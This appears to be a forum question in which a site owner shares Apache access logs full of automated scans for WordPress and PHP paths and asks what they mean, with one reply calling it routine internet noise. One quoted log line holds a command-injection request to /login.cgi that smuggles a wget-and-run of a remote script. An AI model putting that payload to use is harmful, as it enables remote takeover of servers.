2

I've been getting strange page accesses showing up in my apache error log recently. It seems as though someone is trying to access /wp-login.php, /elrekt.php and other pages that don't exist. It's obvious to me that this is malicious because my site does not use WordPress. I looked into my access logs and am now seeing a link to a GitHub repo attached to these GET requests. I am wondering how I can be aware of an attacker gaining access to my site or of the precautions I can take. I don't believe they have made it through my login because these scripts have been running the last three days. Here is some of my access_log:

66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /html/public/index.php HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /html/public/index.php HTTP/1.1" 404 816 "http://myip/html/public/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /public/index.php HTTP/1.1" 302 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /public/index.php HTTP/1.1" 404 816 "http://myip/public/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /TP/html/public/index.php HTTP/1.1" 302 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 816 "http://myip/TP/html/public/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /elrekt.php HTTP/1.1" 302 220 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /elrekt.php HTTP/1.1" 404 816 "http://myip/elrekt.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /index.php HTTP/1.1" 302 219 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET /index.php HTTP/1.1" 404 816 "http://myip/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET / HTTP/1.1" 302 210 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
66.94.85.26 - - [28/Jul/2019:11:33:06 +0000] "GET / HTTP/1.1" 200 3181 "http://myip:80" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
122.228.19.80 - - [28/Jul/2019:11:38:36 +0000] "GET / HTTP/1.1" 200 3181 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
79.137.46.233 - - [28/Jul/2019:12:08:55 +0000] "GET /wp-login.php HTTP/1.1" 302 222 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
79.137.46.233 - - [28/Jul/2019:12:08:56 +0000] "GET /wp-login.php HTTP/1.1" 404 816 "http://www.mysite.ca/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
66.198.246.19 - - [28/Jul/2019:12:46:05 +0000] "GET / HTTP/1.0" 302 210 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
190.122.168.60 - - [28/Jul/2019:12:59:39 +0000] "GET / HTTP/1.1" 302 210 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
148.70.22.139 - - [28/Jul/2019:13:24:19 +0000] "GET / HTTP/1.1" 302 210 "-" "Mozilla/5.0 zgrab/0.x"
148.70.22.139 - - [28/Jul/2019:13:24:22 +0000] "GET / HTTP/1.1" 200 3181 "http://myip:80/" "Mozilla/5.0 zgrab/0.x"
185.53.88.40 - - [28/Jul/2019:14:01:03 +0000] "HEAD /robots.txt HTTP/1.0" 302 - "-" "-"
66.198.246.19 - - [28/Jul/2019:14:42:43 +0000] "GET / HTTP/1.0" 302 210 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
120.29.125.194 - - [28/Jul/2019:14:46:10 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://91.237.249.245/t%20-O%20-%3E%20/tmp/t;sh%20/tmp/t%27$ HTTP/1.1" 400 226 "-" "Hello, World"
37.221.157.20 - - [28/Jul/2019:15:03:17 +0000] "GET / HTTP/1.1" 302 210 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
52.67.133.128 - - [28/Jul/2019:15:57:57 +0000] "GET /wp-login.php HTTP/1.1" 302 222 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
52.67.133.128 - - [28/Jul/2019:15:57:57 +0000] "GET /wp-login.php HTTP/1.1" 404 816 "http://mysite.ca/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
37.59.36.9 - - [28/Jul/2019:16:20:18 +0000] "GET /wp-login.php HTTP/1.1" 302 222 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
37.59.36.9 - - [28/Jul/2019:16:20:19 +0000] "GET /wp-login.php HTTP/1.1" 404 816 "http://mysite.ca/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"

More information as to what I'm dealing with here would also be very much appreciated.

Jordan
  • 21
  • 1
  • 2
  • 1
    What you see is the typical background noise seen on all systems connected to the public internet , a continuous stream of remote and automated probes looking more or less randomly for systems vulnerable to known security issues. As long as your servers kept are secure and current not an immediate worry. If you want you can run an IDS/IPS/web-application-firewall and something like fail2ban in an attempt to block those. – HBruijn Jul 30 '19 at 13:33

0 Answers0